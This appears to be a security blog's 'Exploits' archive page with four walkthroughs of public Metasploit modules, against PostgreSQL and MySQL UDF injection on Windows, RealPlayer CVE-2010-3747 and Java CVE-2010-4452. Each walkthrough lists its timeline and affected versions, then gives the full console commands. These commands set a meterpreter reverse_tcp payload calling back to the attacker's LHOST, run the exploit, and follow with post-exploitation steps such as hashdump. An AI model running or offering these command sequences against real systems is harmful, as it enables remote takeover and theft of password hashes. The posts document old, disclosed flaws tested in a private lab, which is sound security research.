Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution

Exploits, Metasploit,

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-04-01
Metasploit PoC provided by todb the 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows PostgreSQL, before or equal to 8.4.x 32-bit.

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLL’s from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-10-15
Saint PoC provided the 2010-10-22
Metasploit PoC provided the 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits a initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Exploits, Metasploit, ,

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file, create routine,alter routine,execute on *.* to test3@’%’ identified by ‘test3’;

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump